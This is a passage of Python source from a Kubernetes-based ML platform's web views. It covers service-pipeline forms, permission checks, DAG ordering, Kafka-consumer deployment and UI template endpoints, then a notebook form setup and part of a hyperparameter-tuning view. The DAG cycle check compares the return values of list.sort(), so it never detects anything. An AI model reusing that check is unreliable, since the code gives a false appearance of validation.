            widget=Select2Widget()),
        "dag_json": StringField(
            _(datamodel.obj.lab('dag_json')),
            # the widget receives the enclosing field object plus the widget arguments
            widget=MyBS3TextAreaFieldWidget(rows=10)),
        "namespace": StringField(
            _(datamodel.obj.lab('namespace')),
            description="Namespace the task is deployed in (no need to fill in for now)",
            default='service',
            widget=BS3TextFieldWidget()),
        "images": StringField(
            _(datamodel.obj.lab('images')),
            default='ccr.ccs.tencentyun.com/cube-studio/service-pipeline',
            description="Inference service image",
            widget=BS3TextFieldWidget(),
            validators=[DataRequired()]),
        "node_selector": StringField(
            _(datamodel.obj.lab('node_selector')),
            description="Machines the task is deployed on (no need to fill in for now)",
            widget=BS3TextFieldWidget(),
            default=datamodel.obj.node_selector.default.arg),
        "image_pull_policy": SelectField(
            _(datamodel.obj.lab('image_pull_policy')),
            description="Image pull policy (Always: always pull the remote image; IfNotPresent: use the local image if it exists)",
            widget=Select2Widget(),
            choices=[['Always', 'Always'], ['IfNotPresent', 'IfNotPresent']]),
        "alert_status": MySelectMultipleField(
            label=_(datamodel.obj.lab('alert_status')),
            widget=Select2ManyWidget(),
            choices=[[x, x] for x in ['Created', 'Pending', 'Running', 'Succeeded',
                                      'Failed', 'Unknown', 'Waiting', 'Terminated']],
            description="Statuses that trigger notifications"),
        "alert_user": StringField(
            label=_(datamodel.obj.lab('alert_user')),
            widget=BS3TextFieldWidget(),
            description="Users to notify, separated by commas"),
        "label": StringField(
            _(datamodel.obj.lab('label')),
            description='Chinese name',
            widget=BS3TextFieldWidget(),
            validators=[DataRequired()]),
        "resource_memory": StringField(
            _(datamodel.obj.lab('resource_memory')),
            default=Service_Pipeline.resource_memory.default.arg,
            description='Memory limit, e.g. 1G, 10G; at most 100G, contact an administrator if you need more',
            widget=BS3TextFieldWidget(),
            validators=[DataRequired()]),
        "resource_cpu": StringField(
            _(datamodel.obj.lab('resource_cpu')),
            default=Service_Pipeline.resource_cpu.default.arg,
            description='CPU limit (in cores), e.g. 0.4, 10; at most 50 cores, contact an administrator if you need more',
            widget=BS3TextFieldWidget(),
            validators=[DataRequired()]),
        "resource_gpu": StringField(
            _(datamodel.obj.lab('resource_gpu')),
            default=0,
            description='GPU limit (in cards), e.g. 1, 2; each training container occupies whole cards. To request a specific card model write e.g. 1(V100); currently T4/V100/A100/VGPU are supported',
            widget=BS3TextFieldWidget()),
        "replicas": StringField(
            _(datamodel.obj.lab('replicas')),
            default=Service_Pipeline.replicas.default.arg,
            description='Number of pod replicas, used for high availability',
            widget=BS3TextFieldWidget(),
            validators=[DataRequired()]),
        "env": StringField(
            _(datamodel.obj.lab('env')),
            default=Service_Pipeline.env.default.arg,
            description='Environment variables automatically added to tasks using the template; template variables are supported. Format: one variable per line, env_key=env_value',
            widget=MyBS3TextAreaFieldWidget()),
    }
    edit_form_extra_fields = add_form_extra_fields

    # Check edit permission: only the creator and admins may edit.
    def check_edit_permission(self, item):
        user_roles = [role.name.lower() for role in list(get_user_roles())]
        if "admin" in user_roles:
            return True
        if g.user and g.user.username and hasattr(item, 'created_by'):
            if g.user.username == item.created_by.username:
                return True
        flash('just creator can edit/delete ', 'warning')
        return False

    # Validate the args.
    @pysnooper.snoop(watch_explode=('item'))
    def service_pipeline_args_check(self, item):
        core.validate_str(item.name, 'name')
        if not item.dag_json:
            item.dag_json = '{}'
        core.validate_json(item.dag_json)

        # Validate the task relations: no cycles, and the order must be correct.
        # Tasks without configuration get no upstream and stand alone.
        # (An illustrative dag_json appears after this class.)
        # @pysnooper.snoop()
        def order_by_upstream(dag_json):
            order_dag = {}
            # if the config is incomplete, only part of the tasks may be present
            tasks_name = list(dag_json.keys())
            i = 0
            while tasks_name:
                i += 1
                if i > 100:  # there will not be 100 levels of dependencies
                    break
                for task_name in tasks_name:
                    # no configuration at all, hence no upstream
                    if not dag_json[task_name]:
                        order_dag[task_name] = dag_json[task_name]
                        tasks_name.remove(task_name)
                        continue
                    # no upstream configured
                    elif 'upstream' not in dag_json[task_name] or not dag_json[task_name]['upstream']:
                        order_dag[task_name] = dag_json[task_name]
                        tasks_name.remove(task_name)
                        continue
                    # if there are upstream dependencies, first check whether
                    # the upstream tasks were already added
                    upstream_all_ready = True
                    for upstream_task_name in dag_json[task_name]['upstream']:
                        if upstream_task_name not in order_dag:
                            upstream_all_ready = False
                    if upstream_all_ready:
                        order_dag[task_name] = dag_json[task_name]
                        tasks_name.remove(task_name)
                    else:
                        dag_json[task_name]['upstream'] = []
                        order_dag[task_name] = dag_json[task_name]
                        tasks_name.remove(task_name)
            if list(dag_json.keys()).sort() != list(order_dag.keys()).sort():
                flash('dag service pipeline contains a cycle or an unknown upstream', category='warning')
                raise MyappException('dag service pipeline contains a cycle or an unknown upstream')
            return order_dag

        # fill in the missing default upstreams
        dag_json = json.loads(item.dag_json)
        item.dag_json = json.dumps(order_by_upstream(copy.deepcopy(dag_json)),
                                   ensure_ascii=False, indent=4)
        # raise Exception('args is not valid')

    # @pysnooper.snoop()
    def pre_add(self, item):
        item.name = item.name.replace('_', '-')[0:54].lower().strip('-')
        # item.alert_status = ','.join(item.alert_status)
        # self.service_pipeline_args_check(item)
        item.create_datetime = datetime.datetime.now()
        item.change_datetime = datetime.datetime.now()
        item.parameter = json.dumps({}, indent=4, ensure_ascii=False)
        item.volume_mount = item.project.volume_mount + ",%s(configmap):/config/" % item.name

    # @pysnooper.snoop()
    def pre_update(self, item):
        if item.expand:
            core.validate_json(item.expand)
            item.expand = json.dumps(json.loads(item.expand), indent=4, ensure_ascii=False)
        else:
            item.expand = '{}'
        item.name = item.name.replace('_', '-')[0:54].lower()
        item.alert_status = ','.join(item.alert_status)
        # self.service_pipeline_args_check(item)
        item.change_datetime = datetime.datetime.now()
        item.parameter = json.dumps(json.loads(item.parameter), indent=4, ensure_ascii=False) if item.parameter else '{}'
        item.dag_json = json.dumps(json.loads(item.dag_json), indent=4, ensure_ascii=False) if item.dag_json else '{}'
        item.volume_mount = item.project.volume_mount + ",%s(configmap):/config/" % item.name

    @expose("/my/list/")
    def my(self):
        try:
            user_id = g.user.id
            if user_id:
                service_pipelines = db.session.query(Service_Pipeline).filter_by(created_by_fk=user_id).all()
                back = []
                for service_pipeline in service_pipelines:
                    back.append(service_pipeline.to_json())
                return json_response(message='success', status=0, result=back)
        except Exception as e:
            print(e)
            return json_response(message=str(e), status=-1, result={})

    def check_service_pipeline_perms(user_fun):
        # @pysnooper.snoop()
        def wraps(*args, **kwargs):
            service_pipeline_id = int(kwargs.get('service_pipeline_id', '0'))
            if not service_pipeline_id:
                response = make_response("service_pipeline_id not exist")
                response.status_code = 404
                return response
            user_roles = [role.name.lower() for role in g.user.roles]
            if "admin" in user_roles:
                return user_fun(*args, **kwargs)
            join_projects_id = security_manager.get_join_projects_id(db.session)
            service_pipeline = db.session.query(Service_Pipeline).filter_by(id=service_pipeline_id).first()
            if service_pipeline.project.id in join_projects_id:
                return user_fun(*args, **kwargs)
            response = make_response("no perms to run pipeline %s" % service_pipeline_id)
            response.status_code = 403
            return response
        return wraps

    # Build the synchronous service.
    def build_http(self, service_pipeline):
        pass

    # Build the asynchronous service.
    @pysnooper.snoop()
    def build_mq_consumer(self, service_pipeline):
        namespace = conf.get('SERVICE_PIPELINE_NAMESPACE')
        name = service_pipeline.name
        command = service_pipeline.command
        image_secrets = conf.get('HUBSECRET', [])
        user_hubsecrets = db.session.query(Repository.hubsecret).filter(Repository.created_by_fk == g.user.id).all()
        if user_hubsecrets:
            for hubsecret in user_hubsecrets:
                if hubsecret[0] not in image_secrets:
                    image_secrets.append(hubsecret[0])

        from myapp.utils.py.py_k8s import K8s
        k8s_client = K8s(service_pipeline.project.cluster.get('KUBECONFIG', ''))
        dag_json = service_pipeline.dag_json if service_pipeline.dag_json else '{}'

        # create the configmap used by the service
        config_data = {"dag.json": dag_json}
        k8s_client.create_configmap(namespace=namespace, name=name, data=config_data, labels={'app': name})

        env = service_pipeline.env
        if conf.get('SERVICE_PIPELINE_JAEGER', ''):
            env['JAEGER_HOST'] = conf.get('SERVICE_PIPELINE_JAEGER', '')
            env['SERVICE_NAME'] = name

        k8s_client.create_deployment(
            namespace=namespace,
            name=name,
            replicas=service_pipeline.replicas,
            labels={"app": name, "username": service_pipeline.created_by.username},
            # command=['sh', '-c', command] if command else None,
            command=['bash', '-c', "python mq-pipeline/cube_kafka.py"],
            args=None,
            volume_mount=service_pipeline.volume_mount,
            working_dir=service_pipeline.working_dir,
            node_selector=service_pipeline.get_node_selector(),
            resource_memory=service_pipeline.resource_memory,
            resource_cpu=service_pipeline.resource_cpu,
            resource_gpu=service_pipeline.resource_gpu if service_pipeline.resource_gpu else '',
            image_pull_policy=conf.get('IMAGE_PULL_POLICY', 'Always'),
            image_pull_secrets=image_secrets,
            image=service_pipeline.images,
            hostAliases=conf.get('HOSTALIASES', ''),
            env=env,
            privileged=False,
            accounts=None,
            username=service_pipeline.created_by.username,
            ports=None)

    # Only one entry point is allowed; the pipeline cannot consume two queues at once.
    # @event_logger.log_this
    @expose("/run_service_pipeline/<service_pipeline_id>", methods=["GET", "POST"])
    @check_service_pipeline_perms
    def run_service_pipeline(self, service_pipeline_id):
        service_pipeline = db.session.query(Service_Pipeline).filter_by(id=service_pipeline_id).first()
        dag_json = json.loads(service_pipeline.dag_json)
        root_nodes_name = service_pipeline.get_root_node_name()
        self.clear(service_pipeline_id)
        if root_nodes_name:
            root_node_name = root_nodes_name[0]
            root_node = dag_json[root_node_name]
            # build async
            if root_node['template-group'] == 'endpoint' and root_node['template'] == 'mq':
                self.build_mq_consumer(service_pipeline)
            # build sync
            if root_node['template-group'] == 'endpoint' and root_node['template'] == 'gateway':
                self.build_http(service_pipeline)

        return redirect("/service_pipeline_modelview/web/log/%s" % service_pipeline_id)
        # return redirect(run_url)

    # @event_logger.log_this
    @expose("/web/<service_pipeline_id>", methods=["GET"])
    def web(self, service_pipeline_id):
        service_pipeline = db.session.query(Service_Pipeline).filter_by(id=service_pipeline_id).first()
        # service_pipeline.dag_json = service_pipeline.fix_dag_json()
        # service_pipeline.expand = json.dumps(service_pipeline.fix_position(), indent=4, ensure_ascii=False)
        db.session.commit()
        print(service_pipeline_id)
        data = {
            # to be changed once front/back-end integration is finished
            "url": '/static/appbuilder/vison/index.html?pipeline_id=%s' % service_pipeline_id
        }
        # render the template
        return self.render_template('link.html', data=data)

    # @event_logger.log_this
    @expose("/web/log/<service_pipeline_id>", methods=["GET"])
    def web_log(self, service_pipeline_id):
        service_pipeline = db.session.query(Service_Pipeline).filter_by(id=service_pipeline_id).first()
        if service_pipeline.run_id:
            data = {
                "url": service_pipeline.project.cluster.get('PIPELINE_URL') + "runs/details/" + service_pipeline.run_id,
                "target": "div.page_f1flacxk:nth-of-type(0)",
                "delay": 500,
                "loading": True
            }
            # render the template
            if service_pipeline.project.cluster['NAME'] == conf.get('ENVIRONMENT'):
                return self.render_template('link.html', data=data)
            else:
                return self.render_template('external_link.html', data=data)
        else:
            flash('no running instance', 'warning')
            return redirect('/service_pipeline_modelview/web/%s' % service_pipeline.id)

    # tracing
    @expose("/web/monitoring/<service_pipeline_id>", methods=["GET"])
    def web_monitoring(self, service_pipeline_id):
        service_pipeline = db.session.query(Service_Pipeline).filter_by(id=int(service_pipeline_id)).first()
        if service_pipeline.run_id:
            url = service_pipeline.project.cluster.get('GRAFANA_HOST', '').strip('/') + conf.get('GRAFANA_TASK_PATH') + service_pipeline.name
            return redirect(url)
        else:
            flash('no running instance', 'warning')
            return redirect('/service_pipeline_modelview/web/%s' % service_pipeline.id)

    # @event_logger.log_this
    @expose("/web/pod/<service_pipeline_id>", methods=["GET"])
    def web_pod(self, service_pipeline_id):
        service_pipeline = db.session.query(Service_Pipeline).filter_by(id=service_pipeline_id).first()
        data = {
            "url": service_pipeline.project.cluster.get('K8S_DASHBOARD_CLUSTER', '') + '#/search?namespace=%s&q=%s' % (conf.get('SERVICE_PIPELINE_NAMESPACE'), service_pipeline.name.replace('_', '-')),
            "target": "div.kd-chrome-container.kd-bg-background",
            "delay": 500,
            "loading": True
        }
        # render the template
        if service_pipeline.project.cluster['NAME'] == conf.get('ENVIRONMENT'):
            return self.render_template('link.html', data=data)
        else:
            return self.render_template('external_link.html', data=data)

    @expose('/clear/<service_pipeline_id>', methods=['POST', "GET"])
    def clear(self, service_pipeline_id):
        service_pipeline = db.session.query(Service_Pipeline).filter_by(id=service_pipeline_id).first()
        from myapp.utils.py.py_k8s import K8s
        k8s_client = K8s(service_pipeline.project.cluster.get('KUBECONFIG', ''))
        namespace = conf.get('SERVICE_PIPELINE_NAMESPACE')
        k8s_client.delete_deployment(namespace=namespace, name=service_pipeline.name)
        flash('Service cleanup finished', category='warning')
        return redirect('/service_pipeline_modelview/list/')

    @expose("/config/<service_pipeline_id>", methods=("GET", 'POST'))
    def pipeline_config(self, service_pipeline_id):
        print(service_pipeline_id)
        pipeline = db.session.query(Service_Pipeline).filter_by(id=service_pipeline_id).first()
        if not pipeline:
            return jsonify({"status": 1, "message": "service pipeline does not exist", "result": {}})
        if request.method.lower() == 'post':
            data = request.get_json()
            request_config = data.get('config', {})
            request_dag = data.get('dag_json', {})
            if request_config:
                pipeline.config = json.dumps(request_config, indent=4, ensure_ascii=False)
            if request_dag:
                pipeline.dag_json = json.dumps(request_dag, indent=4, ensure_ascii=False)
            db.session.commit()
        # both jump buttons share the same chain icon
        icon_svg = '<svg t="1644980982636" class="icon" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="2611" width="128" height="128"><path d="M913.937279 113.328092c-32.94432-32.946366-76.898391-51.089585-123.763768-51.089585s-90.819448 18.143219-123.763768 51.089585L416.737356 362.999454c-32.946366 32.94432-51.089585 76.898391-51.089585 123.763768s18.143219 90.819448 51.087539 123.763768c25.406646 25.40767 57.58451 42.144866 93.053326 48.403406 1.76418 0.312108 3.51915 0.463558 5.249561 0.463558 14.288424 0 26.951839-10.244318 29.519314-24.802896 2.879584-16.322757-8.016581-31.889291-24.339338-34.768875-23.278169-4.106528-44.38386-15.081487-61.039191-31.736818-21.61018-21.61018-33.509185-50.489928-33.509185-81.322144s11.899004-59.711963 33.509185-81.322144l15.864316-15.864316c-0.267083 1.121544-0.478907 2.267647-0.6191 3.440355-1.955538 16.45988 9.800203 31.386848 26.260084 33.344432 25.863041 3.072989 49.213865 14.378475 67.527976 32.692586 21.608134 21.608134 33.509185 50.489928 33.509185 81.322144s-11.901051 59.71401-33.509185 81.322144L318.53987 871.368764c-21.61018 21.61018-50.489928 33.511231-81.322144 33.511231-30.832216 0-59.711963-11.901051-81.322144-33.511231-21.61018-21.61018-33.509185-50.489928-33.509185-81.322144s11.899004-59.711963 33.509185-81.322144l169.43597-169.438017c11.720949-11.718903 11.720949-30.722722 0-42.441625-11.718903-11.718903-30.722722-11.718903-42.441625 0L113.452935 666.282852c-32.946366 32.94432-51.089585 76.898391-51.089585 123.763768 0 46.865377 18.143219 90.819448 51.089585 123.763768 32.94432 32.946366 76.898391 51.091632 123.763768 51.091632s90.819448-18.145266 123.763768-51.091632l249.673409-249.671363c32.946366-32.94432 51.089585-76.898391 51.089585-123.763768-0.002047-46.865377-18.145266-90.819448-51.089585-123.763768-27.5341-27.536146-64.073294-45.240367-102.885252-49.854455-3.618411-0.428765-7.161097-0.196475-10.508331 0.601704l211.589023-211.589023c21.61018-21.61018 50.489928-33.509185 81.322144-33.509185s59.711963 11.899004 81.322144 33.509185c21.61018 21.61018 33.509185 50.489928 33.509185 81.322144s-11.899004 59.711963-33.509185 81.322144l-150.180418 150.182464c-11.720949 11.718903-11.720949 30.722722 0 42.441625 11.718903 11.718903 30.722722 11.718903 42.441625 0l150.180418-150.182464c32.946366-32.94432 51.089585-76.898391 51.089585-123.763768C965.026864 190.226482 946.882622 146.272411 913.937279 113.328092z" p-id="2612" fill="#225ed2"></path></svg>'
        config = {
            "id": pipeline.id,
            "name": pipeline.name,
            "label": pipeline.describe,
            "project": pipeline.project.describe,
            "pipeline_ui_config": {
                "alert": {
                    "alert_user": {
                        "type": "str",
                        "item_type": "str",
                        "label": "alert users",
                        "require": 1,
                        "choice": [],
                        "range": "",
                        "default": "",
                        "placeholder": "alert user names, comma separated",
                        "describe": "alert users, comma separated",
                        "editable": 1,
                        "condition": "",
                        "sub_args": {}
                    }
                }
            },
            "pipeline_jump_button": [
                {
                    "name": "resource view",
                    "action_url": "",
                    "icon_svg": icon_svg
                },
                {
                    "name": "tracing",
                    "action_url": "http://swallow.music.woa.com/myapp/swallow#/?pathUrl=%2Fswallow%2FdispatchOps%2FTaskListManager",
                    "icon_svg": icon_svg
                }
            ],
            "pipeline_run_button": [],
            "task_jump_button": [],
            "dag_json": json.loads(pipeline.dag_json),
            "config": json.loads(pipeline.config),
            "message": "success",
            "status": 0
        }
        return jsonify(config)

    @expose("/template/list/")
    def template_list(self):
        all_template = {
            "message": "success",
            "templte_common_ui_config": {},
            "template_group_order": ["entry", "logic node", "function node"],
            "templte_list": {
                "entry": [
                    {
                        "template_name": "kafka",
                        "template_id": 1,
                        "templte_ui_config": {
                            "shell": {
                                "topic": {"type": "str", "item_type": "str", "label": "topic", "require": 1, "choice": [], "range": "", "default": "predict", "placeholder": "", "describe": "kafka topic", "editable": 1, "condition": "", "sub_args": {}},
                                "consumer_num": {"type": "str", "item_type": "str", "label": "number of consumers", "require": 1, "choice": [], "range": "", "default": "4", "placeholder": "", "describe": "number of consumers", "editable": 1, "condition": "", "sub_args": {}},
                                "bootstrap_servers": {"type": "str", "item_type": "str", "label": "address", "require": 1, "choice": [], "range": "", "default": "127.0.0.1:9092", "placeholder": "", "describe": "xx.xx.xx.xx:9092,xx.xx.xx.xx:9092", "editable": 1, "condition": "", "sub_args": {}},
                                "group": {"type": "str", "item_type": "str", "label": "group", "require": 1, "choice": [], "range": "", "default": "predict", "placeholder": "", "describe": "consumer group", "editable": 1, "condition": "", "sub_args": {}}
                            }
                        },
                        "username": g.user.username,
                        "changed_on": datetime.datetime.now(),
                        "created_on": datetime.datetime.now(),
                        "label": "kafka",
                        "describe": "consume kafka data",
                        "help_url": "",
                        "pass_through": {}  # arbitrary content passed back through the task field
                    }
                ],
                "logic node": [
                    {
                        "template_name": "switch",
                        "template_id": 2,
                        "templte_ui_config": {
                            "shell": {
                                "case": {"type": "text", "item_type": "str", "label": "expression", "require": 1, "choice": [], "range": "", "default": "int(input['node2'])<3:node4,node5:'3'\ndefault:node6:'0'", "placeholder": "", "describe": "condition:downstream nodes:output, where input is the node input", "editable": 1, "condition": "", "sub_args": {}}
                            }
                        },
                        "username": g.user.username,
                        "changed_on": datetime.datetime.now(),
                        "created_on": datetime.datetime.now(),
                        "label": "switch-case logic node",
                        "describe": "controls the data flow",
                        "help_url": "",
                        "pass_through": {}
                    },
                ],
                "function node": [
                    {
                        "template_name": "http",
                        "template_id": 3,
                        "templte_ui_config": {
                            "shell": {
                                "method": {"type": "choice", "item_type": "str", "label": "request method", "require": 1, "choice": ["GET", "POST"], "range": "", "default": "POST", "placeholder": "", "describe": "request method", "editable": 1, "condition": "", "sub_args": {}},
                                "url": {"type": "str", "item_type": "str", "label": "request url", "require": 1, "choice": [], "range": "", "default": "http://127.0.0.1:8080/api", "placeholder": "", "describe": "request url", "editable": 1, "condition": "", "sub_args": {}},
                                "header": {"type": "text", "item_type": "str", "label": "request headers", "require": 1, "choice": [], "range": "", "default": "{}", "placeholder": "", "describe": "request headers", "editable": 1, "condition": "", "sub_args": {}},
                                "timeout": {"type": "int", "item_type": "str", "label": "request timeout", "require": 1, "choice": [], "range": "", "default": "300", "placeholder": "", "describe": "request timeout", "editable": 1, "condition": "", "sub_args": {}},
                                "date": {"type": "text", "item_type": "str", "label": "request body", "require": 1, "choice": [], "range": "", "default": "{}", "placeholder": "", "describe": "request body", "editable": 1, "condition": "", "sub_args": {}}
                            }
                        },
                        "username": g.user.username,
                        "changed_on": datetime.datetime.now(),
                        "created_on": datetime.datetime.now(),
                        "label": "HTTP request",
                        "describe": "HTTP request",
                        "help_url": "",
                        "pass_through": {}
                    },
                    {
                        "template_name": "custom function",
                        "template_id": 4,
                        "templte_ui_config": {
                            "shell": {
                                "sdk_path": {"type": "str", "item_type": "str", "label": "function file path", "require": 1, "choice": [], "range": "", "default": "", "placeholder": "", "describe": "function file path; the file name and the python type must match", "editable": 1, "condition": "", "sub_args": {}},
                            }
                        },
                        "username": g.user.username,
                        "changed_on": datetime.datetime.now(),
                        "created_on": datetime.datetime.now(),
                        "label": "custom function",
                        "describe": "custom function",
                        "help_url": "",
                        "pass_through": {}
                    }
                ],
            },
            "status": 0
        }
        index = 1
        for group in all_template['templte_list']:
            for template in all_template['templte_list'][group]:
                template['template_id'] = index
                template['changed_on'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
                template['created_on'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
                template['username'] = g.user.username
                index += 1
        return jsonify(all_template)
def set_column(self, notebook=None):
    # adjust the form fields for editing
    self.add_form_extra_fields['name'] = StringField(
        _(self.datamodel.obj.lab('name')),
        default="%s-" % g.user.username + uuid.uuid4().hex[:4],
        description='English name (letters, digits and -), at most 50 characters',
        widget=MyBS3TextFieldWidget(readonly=True if notebook else False),
        # note: the name must not start or end with '-'
        validators=[DataRequired(), Regexp(r"^[a-z][a-z0-9\-]*[a-z0-9]$"), Length(1, 54)]
    )
    self.add_form_extra_fields['describe'] = StringField(
        _(self.datamodel.obj.lab('describe')),
        default="%s's personal notebook" % g.user.username,
        description='Chinese description',
        widget=BS3TextFieldWidget(),
        validators=[DataRequired()])
    self.add_form_extra_fields['project'] = QuerySelectField(
        _(self.datamodel.obj.lab('project')),
        default='',
        description=_('project group to deploy into'),
        query_factory=filter_join_org_project,
        widget=MySelect2Widget(
            extra_classes="readonly" if notebook else None,
            new_web=False),
    )
    self.add_form_extra_fields['images'] = SelectField(
        _(self.datamodel.obj.lab('images')),
        description=_('Base image for the notebook environment; if it is shown incorrectly, delete and recreate the notebook'),
        widget=MySelect2Widget(
            extra_classes="readonly" if notebook else None,
            new_web=False),
        choices=conf.get('NOTEBOOK_IMAGES', []),
        # validators=[DataRequired()]
    )
    self.add_form_extra_fields['node_selector'] = StringField(
        _(self.datamodel.obj.lab('node_selector')),
        default='cpu=true,notebook=true',
        description="Machines the task is deployed on",
        widget=BS3TextFieldWidget())
    self.add_form_extra_fields['image_pull_policy'] = SelectField(
        _(self.datamodel.obj.lab('image_pull_policy')),
        description="Image pull policy (Always: always pull the remote image; IfNotPresent: use the local image if it exists)",
        widget=Select2Widget(),
        choices=[['Always', 'Always'], ['IfNotPresent', 'IfNotPresent']])
    self.add_form_extra_fields['volume_mount'] = StringField(
        _(self.datamodel.obj.lab('volume_mount')),
        default=notebook.project.volume_mount if notebook else '',
        description='External mounts, format: $pvc_name1(pvc):/$container_path1,$pvc_name2(pvc):/$container_path2',
        widget=BS3TextFieldWidget())
    self.add_form_extra_fields['working_dir'] = StringField(
        _(self.datamodel.obj.lab('working_dir')),
        default='/mnt',
        description="Working directory; if empty, the workingdir defined in the Dockerfile is used",
        widget=BS3TextFieldWidget())
    self.add_form_extra_fields['resource_memory'] = StringField(
        _(self.datamodel.obj.lab('resource_memory')),
        default=Notebook.resource_memory.default.arg,
        description='Memory limit, e.g. 1G, 20G',
        widget=BS3TextFieldWidget(),
        validators=[DataRequired()])
    self.add_form_extra_fields['resource_cpu'] = StringField(
        _(self.datamodel.obj.lab('resource_cpu')),
        default=Notebook.resource_cpu.default.arg,
        description='CPU limit (in cores), e.g. 2',
        widget=BS3TextFieldWidget(),
        validators=[DataRequired()])
    self.add_form_extra_fields['resource_gpu'] = StringField(
        _(self.datamodel.obj.lab('resource_gpu')),
        default='0',
        description='GPU limit (in cards), e.g. 1, 2; each training container occupies whole cards. To request a specific card model write e.g. 1(V100); currently T4/V100/A100/VGPU are supported',
        widget=BS3TextFieldWidget(),
        # choices=conf.get('GPU_CHOICES', [[]]),
        validators=[DataRequired()])

    columns = ['name', 'describe', 'images', 'resource_memory', 'resource_cpu', 'resource_gpu']
    self.add_columns = ['project'] + columns
    # No mount config when adding; the project's mount config is used.
    # When editing, an admin may add special mount configs for special cases.
    if g.user.is_admin():
        columns.append('volume_mount')
    self.edit_columns = ['project'] + columns
    self.edit_form_extra_fields = self.add_form_extra_fields
class Hyperparameter_Tuning_ModelView_Base():
    datamodel = SQLAInterface(Hyperparameter_Tuning)
    conv = GeneralModelConverter(datamodel)
    label_title = 'hyperparameter search'
    check_redirect_list_url = '/hyperparameter_tuning_modelview/list/'
    help_url = conf.get('HELP_URL', {}).get(datamodel.obj.__tablename__, '') if datamodel else ''
    base_permissions = ['can_add', 'can_edit', 'can_delete', 'can_list', 'can_show']  # the defaults
    base_order = ('id', 'desc')
    base_filters = [["id", HP_Filter, lambda: []]]  # permission filter
    order_columns = ['id']
    list_columns = ['project', 'name_url', 'describe', 'job_type', 'creator', 'run_url', 'modified']
    show_columns = ['created_by', 'changed_by', 'created_on', 'changed_on', 'job_type', 'name',
                    'namespace', 'describe', 'parallel_trial_count', 'max_trial_count',
                    'max_failed_trial_count', 'objective_type', 'objective_goal',
                    'objective_metric_name', 'objective_additional_metric_names',
                    'algorithm_name', 'algorithm_setting', 'parameters_html',
                    'trial_spec_html', 'experiment_html']
    add_form_query_rel_fields = {
        "project": [["name", Project_Filter, 'org']]
    }
    edit_form_query_rel_fields = add_form_query_rel_fields
    edit_form_extra_fields = {}
    edit_form_extra_fields["alert_status"] = MySelectMultipleField(
        label=_(datamodel.obj.lab('alert_status')),
        widget=Select2ManyWidget(),
        choices=[[x, x] for x in ['Pending', 'Running', 'Succeeded', 'Failed', 'Unknown', 'Waiting', 'Terminated']],
        description="statuses that trigger a notification",
    )
    edit_form_extra_fields['name'] = StringField(
        _(datamodel.obj.lab('name')),
        description='English name (letters, digits and "-" only), at most 50 characters',
        widget=BS3TextFieldWidget(),
        validators=[DataRequired(), Regexp(r"^[a-z][a-z0-9\-]*[a-z0-9]$"), Length(1, 54)]
    )
    edit_form_extra_fields['describe'] = StringField(
        _(datamodel.obj.lab('describe')),
        description='description',
        widget=BS3TextFieldWidget(),
        validators=[DataRequired()]
    )
    edit_form_extra_fields['namespace'] = StringField(
        _(datamodel.obj.lab('namespace')),
        description='namespace to run in',
        widget=BS3TextFieldWidget(),
        default=datamodel.obj.namespace.default.arg,
        validators=[DataRequired()]
    )
    edit_form_extra_fields['parallel_trial_count'] = IntegerField(
        _(datamodel.obj.lab('parallel_trial_count')),
        default=datamodel.obj.parallel_trial_count.default.arg,
        description='number of trials that may run in parallel',
        widget=BS3TextFieldWidget(),
        validators=[DataRequired()]
    )
    edit_form_extra_fields['max_trial_count'] = IntegerField(
        _(datamodel.obj.lab('max_trial_count')),
        default=datamodel.obj.max_trial_count.default.arg,
        description='maximum total number of trials',
        widget=BS3TextFieldWidget(),
        validators=[DataRequired()]
    )
    edit_form_extra_fields['max_failed_trial_count'] = IntegerField(
        _(datamodel.obj.lab('max_failed_trial_count')),
        default=datamodel.obj.max_failed_trial_count.default.arg,
        description='maximum number of failed trials',
        widget=BS3TextFieldWidget(),
        validators=[DataRequired()]
    )
    edit_form_extra_fields['objective_type'] = SelectField(
        _(datamodel.obj.lab('objective_type')),
        default=datamodel.obj.objective_type.default.arg,
        description='objective type (must match your code)',
        widget=Select2Widget(),
        choices=[['maximize', 'maximize'], ['minimize', 'minimize']],
        validators=[DataRequired()]
    )
    edit_form_extra_fields['objective_goal'] = FloatField(
        _(datamodel.obj.lab('objective_goal')),
        default=datamodel.obj.objective_goal.default.arg,
        description='objective goal threshold',
        widget=BS3TextFieldWidget(),
        validators=[DataRequired()]
    )
    edit_form_extra_fields['objective_metric_name'] = StringField(
        _(datamodel.obj.lab('objective_metric_name')),
        default=datamodel.obj.objective_metric_name.default.arg,
        description='objective metric name (must match your code)',
        widget=BS3TextFieldWidget(),
        validators=[DataRequired()]
    )
    edit_form_extra_fields['objective_additional_metric_names'] = StringField(
        _(datamodel.obj.lab('objective_additional_metric_names')),
        default=datamodel.obj.objective_additional_metric_names.default.arg,
        description='additional objective metrics (must match your code)',
        widget=BS3TextFieldWidget()
    )
    algorithm_name_choices = ['grid', 'random', 'hyperband', 'bayesianoptimization']
    algorithm_name_choices = [[choice, choice] for choice in algorithm_name_choices]
    edit_form_extra_fields['algorithm_name'] = SelectField(
        _(datamodel.obj.lab('algorithm_name')),
        default=datamodel.obj.algorithm_name.default.arg,
        description='search algorithm',
        widget=Select2Widget(),
        choices=algorithm_name_choices,
        validators=[DataRequired()]
    )
    edit_form_extra_fields['algorithm_setting'] = StringField(
        _(datamodel.obj.lab('algorithm_setting')),
        default=datamodel.obj.algorithm_setting.default.arg,
        widget=BS3TextFieldWidget(),
        description='search algorithm settings'
    )
    edit_form_extra_fields['parameters_demo'] = StringField(
        _(datamodel.obj.lab('parameters_demo')),
        description='example search parameters in standard JSON; note: write all ints and floats as strings',
        widget=MyCodeArea(code=core.hp_parameters_demo()),
    )
    edit_form_extra_fields['parameters'] = StringField(
        _(datamodel.obj.lab('parameters')),
        default=datamodel.obj.parameters.default.arg,
        description='search parameters; note: write all ints and floats as strings',
        widget=MyBS3TextAreaFieldWidget(rows=10),
        validators=[DataRequired()]
    )
    edit_form_extra_fields['node_selector'] = StringField(
        _(datamodel.obj.lab('node_selector')),
        description="machine on which the task is deployed (currently not required)",
        widget=BS3TextFieldWidget()
    )
    edit_form_extra_fields['working_dir'] = StringField(
        _(datamodel.obj.lab('working_dir')),
        description="working directory; when empty, the workingdir defined in the Dockerfile is used",
        widget=BS3TextFieldWidget()
    )
    edit_form_extra_fields['image_pull_policy'] = SelectField(
